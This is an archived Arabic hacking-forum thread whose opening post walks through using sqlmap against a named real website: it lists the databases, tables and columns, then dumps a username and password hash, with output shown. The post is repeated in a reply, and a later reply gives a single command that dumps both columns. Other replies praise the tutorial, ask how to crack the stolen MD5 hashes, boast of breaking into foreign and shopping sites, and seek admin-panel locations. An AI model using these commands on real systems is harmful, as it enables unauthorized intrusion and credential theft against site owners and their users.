[دورة التوزيعات الامنية] استغلال ثغرات sql في الباك تراك [الأرشيف]

r00t-minat0r

08-15-2011, 05:52 AM

بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
الكل يعرف انه ثغرات sql من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة ممكنة باستخدام اداة في الباك تراك
اسم الأداة :sqlmap
مسار الاداة : /pentest/database/sqlmap
لغة البرمجة : python
الأن كيفية استخدام الاداة في عملية الحقن
اولا : استخراج اسماء قواعد البيانات
لنقل ان هذا الموقع مصاب بثغرة sql

http://www.bcspeakers.com/page.php?id=22
وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs

النتيجة

available databases [2]:

information_schema

www-bcspeakerstest

مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables

والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns

والنتيجة كالتالي

+----------+---------------------------+
| Column | Type |
+----------+---------------------------+
| id_user | int(10) unsigned zerofill |
| password | text |
| username | text |
+----------+---------------------------+
كما ترون الأعمدة المستهدفة هي
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump

النتيجة

+--------------+
| username |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+

كما ترون استخرجنا اسم المستخدم
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump

سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة

recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]

تختار مثل ما نت عاوز
انا اخترت لا لتسريع العملية والنتيجة كالتالي

+----------------------------------+
| password |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448 |
+----------------------------------+
كما ترون تم استخراج البيانات بسرعة كبيرة
اتمنى ان يعجبكم الشرح
وأي استفسار انا جاهز
والسلام عليكم ورحمة الله وبركاته

halk green

08-15-2011, 06:44 AM

والله بجد روعة الله يوفقك ، أتمنى المزيد والمزيد من مشاركاتك الرائعة والحصرية

r00t-minat0r

08-15-2011, 07:07 AM

والله بجد روعة الله يوفقك ، أتمنى المزيد والمزيد من مشاركاتك الرائعة والحصرية
بارك الله فيك ومشكور على مرورك العطر

Omar Hack

08-15-2011, 07:40 AM

بارك الله فيك أخوي العزيز
وزادك الله من علمه

halk green

08-15-2011, 09:26 AM

والله مشكور عنجد مجهود رائع

Ace

08-15-2011, 02:12 PM

الشرح الفديو بنزلو قريبا ومشكور اخي على الطرح استمر

djxxjd

08-15-2011, 02:41 PM

niccccccccce

djxxjd

08-15-2011, 03:51 PM

gooooooooooooood

r00t-minat0r

08-15-2011, 08:47 PM

بارك الله فيك أخوي العزيز
وزادك الله من علمه
مشكور اخي عمر على مرورك اتمنى ان يكون الشرح ذا فائدة للجميع

الشرح الفديو بنزلو قريبا ومشكور اخي على الطرح استمر
ان شاء الله اخي العزيز مشكور على مرورك منور الموضوع
سوف نضع المزيد من المواضييع في هذا القسم الرائع بأذن الله خلاص انتهى زمان البيفروست وغيره

niccccccccce
مشكور على مرورك اخي الكريم

Mad Devil

08-15-2011, 09:01 PM

مشكورررر يالغالي والله ماقصرت

ويا portgas~D~Ace

ممكن الفيديو لو سمحت يعني

Ace

08-15-2011, 09:24 PM

مشكورررر يالغالي والله ماقصرت

ويا portgas~D~Ace

ممكن الفيديو لو سمحت يعني

عيوووووووووووووني اخي

Hidden pain

08-16-2011, 02:43 AM

شرح روعة أخي
بارك الله فيك
استمر مع حصرياتك

r00t-minat0r

08-16-2011, 03:52 AM

شرح روعة أخي
بارك الله فيك
استمر مع حصرياتك
مشكور اخي وانا يشرفني مرورك على الموضوع

morgos

08-26-2011, 04:56 AM

شكرا لتعليمي ولكن كيف فك تشفير كلمة المرور (md5) الرجاء

حيوش

09-04-2011, 01:44 AM

نعم كيف يتم فك التشفيررررررررر انا اخترقت كثير مواقع اجنبية ولاكن المشكلة في فك التشفيررررررررر الي يعرف يقول ؟؟؟؟؟؟؟؟

ومشكورررررررررر على الشرح المبدع

مهكر القلوب

10-07-2011, 10:29 PM

مشكووووووووور بارك الله فيك

hassan.dk

10-19-2011, 02:59 PM

مبدع مشاء الله الله يجعلنا من المستفيدين منك و مشكور اخي على المجهود :cool:

hmezkcq

10-22-2011, 01:49 AM

بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
الكل يعرف انه ثغرات sql من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة ممكنة باستخدام اداة في الباك تراك
اسم الأداة :sqlmap
مسار الاداة : /pentest/database/sqlmap
لغة البرمجة : python
الأن كيفية استخدام الاداة في عملية الحقن
اولا : استخراج اسماء قواعد البيانات
لنقل ان هذا الموقع مصاب بثغرة sql

http://www.bcspeakers.com/page.php?id=22
وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs

النتيجة

available databases [2]:

information_schema

www-bcspeakerstest

مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables

والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns

والنتيجة كالتالي

+----------+---------------------------+
| Column | Type |
+----------+---------------------------+
| id_user | int(10) unsigned zerofill |
| password | text |
| username | text |
+----------+---------------------------+
كما ترون الأعمدة المستهدفة هي
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump

النتيجة

+--------------+
| username |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+

كما ترون استخرجنا اسم المستخدم
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump

سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة

recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]

تختار مثل ما نت عاوز
انا اخترت لا لتسريع العملية والنتيجة كالتالي

+----------------------------------+
| password |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448 |
+----------------------------------+
كما ترون تم استخراج البيانات بسرعة كبيرة
اتمنى ان يعجبكم الشرح
وأي استفسار انا جاهز
والسلام عليكم ورحمة الله وبركاته

لو كان شرحا عبر فيديو لكان روعة أخي فيديو من فضلك

قاتل الهكر

01-30-2012, 03:47 PM

مشكور على الموضوع اخوي

EgYpT.HaCkEr

01-30-2012, 08:00 PM

رافو احلى تقيم

السفاح M

01-31-2012, 06:19 PM

مشكور على المعلوات القيمة

bade boo

01-31-2012, 08:14 PM

مشكوووووووووووووووور

Ghost-007

02-16-2012, 05:06 PM

مشكوررررررررررررررررررررر ررررررررررررررر

Ghost-007

02-16-2012, 05:07 PM

مشكوووووووووووووووور

Ghost-007

02-16-2012, 05:07 PM

مشكور على المعلوات القيمة

Ghost-007

02-16-2012, 05:09 PM

مشكوووووووووو

Ghost-007

02-16-2012, 05:10 PM

مشكووووووووو

Ghost-007

02-16-2012, 05:27 PM

مشكوررررررررررررررررررر

Ghost-007

02-16-2012, 05:28 PM

مشكورررررررررررررررررر

Ghost-007

02-16-2012, 05:28 PM

مشكوررررررررررررررررر

Ghost-007

02-16-2012, 05:29 PM

مشكورررررررررررررررر

Ghost-007

02-16-2012, 05:30 PM

مشكوررررررررررررر

Ghost-007

02-16-2012, 05:31 PM

مشكورررررررررر

Ghost-007

02-16-2012, 05:32 PM

مشكوررررررر

Ghost-007

02-16-2012, 05:34 PM

مشكوررررةةةةةةةةةةةةةةةةة ةةةةةةةة

Ghost-007

02-16-2012, 05:35 PM

مشكوررررةةةةةةةةةةةةةةةةة ةةةةةةةة

Ghost-007

02-16-2012, 05:39 PM

مشكوررررةةةةةةةةةةةةةةةةة ةةةة

Ghost-007

02-16-2012, 05:41 PM

مشكوررررةةةةةةةةةةةةةةةةة ةة

Ghost-007

02-16-2012, 05:43 PM

مشكوررررةةةةةةةةةةةةةةةة

Ghost-007

02-16-2012, 05:44 PM

مشكوررررررررررررررررررررر ررررررررررررررررررررررررر رررررررر

Ghost-007

02-16-2012, 05:47 PM

مشكوررررررررررررررررررررر ررررررررررررررررررررررررر ررررررر

Ghost-007

02-16-2012, 05:48 PM

مشكوررررررررررررررررررررر ررررررررررررررررررررررررر ررررر

Ghost-007

02-16-2012, 05:49 PM

مشكوررررررررررررررررررررر ررررررررررررررررررررررررر ررر

Ghost-007

02-16-2012, 05:50 PM

مشكوررررررررررررررررررررر ررررررررررررررررررررررررر رررررررر

Ghost-007

02-16-2012, 05:50 PM

مشكوررررررررررررررررررررر ررررررررررررررررررررررر

Ghost-007

02-16-2012, 06:01 PM

مشكوررررررررررررررررررررر ررررررررررررررررر

Ghost-007

02-16-2012, 06:01 PM

مشكوررررررررررررررررررررر ررررررررررررررررررررررررر رررررررر

مشكوررررررررررررررررررررر رررررررررررررررررررر

Ghost-007

02-16-2012, 06:02 PM

مشكوررررررررررررررررررررر ررررر

IQX

07-15-2012, 10:27 PM

مًًـُُـًــشـًَِـ:ـكـًــًؤ� �ؤِؤْر:) ♡♡♡♡♡

jaroud007

07-17-2012, 05:10 PM

مشكور اخي و جزاك الله الف خيرو الله االله ينورك اخي جميل
تقبل مروري موفق بإذن الله ... لك مني أجمل تحية .

....قَالَ رَسُولُ اللَّهِ صلى الله عليه وسلم ‏
(("‏‏ مَنْ سُئِلَ عَنْ عِلْمٍ فَكَتَمَهُ أَلْجَمَهُ اللَّهُ بِلِجَامٍ مِنْ نَارٍ يَوْمَ الْقِيَامَةِ ‏"‏‏ )).

فَقَاتِلْ فِي سَبِيلِ اللَّهِ لا تُكَلَّفُ إِلا نَفْسَكَ وَحَرِّضِ الْمُؤْمِنِينَ
عَسَى اللَّهُ أَنْ يَكُفَّ بَأْسَ الَّذِينَ كَفَرُوا وَاللَّهُ أَشَدُّ بَأْسًا وَأَشَدُّ تَنْكِيلا

وقوله تعالى :

[ وَلاَ تَحْسَبَنَّ الَّذِينَ قُتِلُواْ فِي سَبِيلِ اللّهِ أَمْوَاتاً بَلْ أَحْيَاء عِندَ رَبِّهِمْ يُرْزَقُونَ{169} فَرِحِينَ بِمَا آتَاهُمُ اللّهُ مِن فَضْلِهِ وَ يَسْتَبْشِرُونَ بِالَّذِينَ لَمْ

يَلْحَقُواْ بِهِم مِّنْ خَلْفِهِمْ أَلاَّ خَوْفٌ عَلَيْهِمْ وَلاَ هُمْ يَحْزَنُونَ{170} يَسْتَبْشِرُونَ بِنِعْمَةٍ مِّنَ اللّهِ وَفَضْلٍ وَأَنَّ اللّهَ لاَ يُضِيعُ أَجْرَ الْمُؤْمِنِينَ{171} ]

سورة آل عمران

( قُلْ إِنَّ صَلَاتِي وَنُسُكِي وَمَحْيَايَ وَمَمَاتِي لِلَّهِ رَبّ الْعَالَمِينَ، لَا شَرِيكَ لَهُ وَبِذَلِكَ أُمِرْتُ وَأَنَا أَوَّلُ الْمُسْلِمِينَ )

صدق الله العضيم
سبحان الله عدد ما كان وعدد ما سيكون وعدد الصمت والسكون
الا ان حزب الله هم الغالبون
لن تركع امة قائدها محمد (ص)

لا تأسف على الزمان لطالما بلت على جتث الاسود كلاب لا قصدها ان تعلوا على اسياديها تبقى الاسود أسود وكلاب كلا تبقى الاسود

مخيفة في اسرها حتى وان نبحت عليها الكلاب

قـُل مآشئـت في مسبتـي فسكُوتي عن آلحقيـرٍ .. جوٍآإب ..
ليس ضعفا مني ولكن مامن اسد يرد على خطب..الكلاب ...
تعلم للمنفعة أو لرد الضرر
مشكور اخي
__________________
قال: الرسول صلى الله عليه وسلم

1- { من ترك صلاة الفجر فليس في وجه نور }
2- { من ترك صلاة الظهر فليس في رزقة بركه }
3- { من ترك صلاةالعصرفليس في جسمه قوة }
4- { من ترك صلاة المغرب فليس في أولادة ثمرهـ}
5- { من ترك صلاة العشاء فليس فينومه رأحه}
مشكور اخي

قال رسول الله صلى الله عليه وآله وسلم : 'الحمد لله الذي تواضع كلُّ شيء لعظمته، الحمد لله الذي استسلم كلُّ شيء لقدرته، الحمد لله الذي ذلَّ كلُّ شيء لعزته، الحمد لله الذي خضع كل شيء لملكه
من قال هذا الدعاء مرة واحدة، تكتب له 1000 حسنة ويرفع به 1000 درجة، ويوكل الله له 70000 ملك يستغفرون له إلى يوم القيامة .
حق على من سمع هذا الدعاء يعلمه لغيره ……والدال على الخير كفاعله
لا تحسبوا رقصي بينكم طربا ***فإن الطير يرقص مدبوحا من شدة الإلم

sarahassan

10-02-2012, 06:38 AM

ابدااااااااااااااااااااع

xXEnigmaXx

10-04-2012, 10:39 AM

بارك الله فيك
شكرا على المعلومات المفيدة

سارة الغامدي

10-04-2012, 11:46 PM

يسلمؤؤؤؤ ..

إُلقنـآصّ

10-20-2012, 06:50 PM

بارك الله فيك اخي شرح ولا اروع .. شكراً وتسلم يابطلٌ ..!

marshall

10-21-2012, 12:12 AM

السلام عليكم و رحمة الله و بركاته
اشكرك على هدا الشرح الوفي لكن كيف افك تشفير باسورد كهدا 76e375e35ccca94a علما اني استعملت مواقع كثيرة لفك التشفير و لم احصل على نتيجة
شكرا

عبد الله العزاني

10-22-2012, 12:04 AM

مشكور اخوي يعطيك الف عافية

مُنتَقِمـ لِفَلـسطـين

10-30-2012, 02:04 AM

مشكور ما قصرت

zias

11-08-2012, 07:46 PM

مشكورررر بارك الله فيك

THABET Dz MEN

01-19-2013, 11:01 AM

مشكوووووووووووووووووووووو وووووووووووور

المايسترو سيزار

01-26-2013, 02:04 PM

مشكور ويعطيك العافيه

عبدالله97

01-30-2013, 07:01 PM

بارك الله فيك يعطيك العافية انشاء الله .......بالتوفيق

محمد 2015

02-16-2013, 07:48 PM

مششكووووووووووووووور اخي

مهدي-هكر

10-12-2013, 07:14 PM

هههههههه وصلت لموقع شوبنج بس ما عرفت مسار لوحة التحكم :wink: << إنهبل
ممكن تساعدوني بالخاص لو سمحتم عن طريقة إيجاد لوحة التحكم

refland

10-16-2013, 05:22 PM

شرح واضح جدا جدا فقط هناك ملاحظة الموضوع لن يكون اكثر متعة الا اذا كنت تتقن الحقن اليدوي للاكواد عن جد هذا كلام اقوله عن علم

- - - تم التحديث - - -

هههههههه وصلت لموقع شوبنج بس ما عرفت مسار لوحة التحكم :wink: << إنهبل
ممكن تساعدوني بالخاص لو سمحتم عن طريقة إيجاد لوحة التحكم
لن اساعدك بشكل مباشر لكن ساوجهك بخصوص ان تجد لوحة التحكم لازم تفكر في سكريبت ما يساعدك على ايجاد لوحة التحكم سواء يعمل على البيرل او سيرفر شخصي من نوع php
كما انبهك لنقطة جد مهمة انه توجد اداة في الباتراك تساعدكعلى تحديد لو حة التحم فيه كثير كثير ادوات
موفق

- - - تم التحديث - - -

لو كان شرحا عبر فيديو لكان روعة أخي فيديو من فضلك
اخي انا احترم وجهت رايك ان يكون هناك فيديو لكن لو سمحت لي عن جد لو انت تتقن اكواد الحقن بشكل جيد وتميز بين الصفحات سكيول كما تحترف تخطي الفلترة وكل شيئ لن تحتاج الى فيديو لان الدرس واضح
كل مافيه يجب ان تعرف انه بعد تطبيق الامر
python sqlmap.py -u URLpage.php?id=22 --dbs

اللي يعمل على اعطائك اسم قاعدة البيانات التي هي بدورها تحتاجها لمعرفة الجداول ثم بعد معرفة الجداول لازم .........
بمعني لو انت بدات من الحقن اليدوي تفهم على طول
كمان فيه نقطة مهمة تتعلق بتحديد ثغرات سكيول اقصد هناك اداو في الباتراك جد رائعة اسمها
WAPITI
ستحتاجها لاستخراج ثغرات السكيول ادرس الاداة فهي مهمة
المهم ساعطيك فيديو
http://www.youtube.com/watch?v=GPPaGi86UDQ

Abdullah Alhomsy

10-17-2013, 01:19 PM

بسم الله الرحمن الرحيم ~.

مشكور على الطريقة ~.

كاسر المشاعر

11-04-2013, 11:11 AM

مشكووووووووووووووووووور

ميستر انونيموس

02-12-2014, 11:09 PM

مشكورررر يالغالي والله ماقصرت

ويا portgas~D~Ace

ممكن الفيديو لو سمحت يعني
مشكوووووووووور

mazen110m

02-22-2014, 01:17 PM

ما شاء الله عليك
تسلم يا غالى

Alantry

02-24-2014, 12:19 AM

مشكوووووووور

- - - تم التحديث - - -

مشكوووووووور..

- - - تم التحديث - - -

مشكوووووووور...........

yassine007

03-20-2014, 09:48 PM

بارك الله فيك مشكور

dz roocker

03-22-2014, 05:35 PM

موضوع مفيد . لكن جرب استخراج user و pass بامر واحد
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C user,password --dump

MT3BHM

04-18-2014, 11:57 AM

بارك الله فيك ي الغالي

MT3BHM

04-24-2014, 09:07 AM

ابداااااااااع

لتواصل معي سلسعيات هكر
او لتبادل الخبرات

bb: 7b5525c5

MT3BHM

04-27-2014, 08:44 AM

ابدااااااع
لتواصل او تبادل الخبرات
bb: 7b5525c5

Hitler07

05-12-2014, 07:18 PM

ولا زالت المشكله الكبرى امام الاسكيول ( الهاش ) عندي هاشات كثير بس كيف تنفك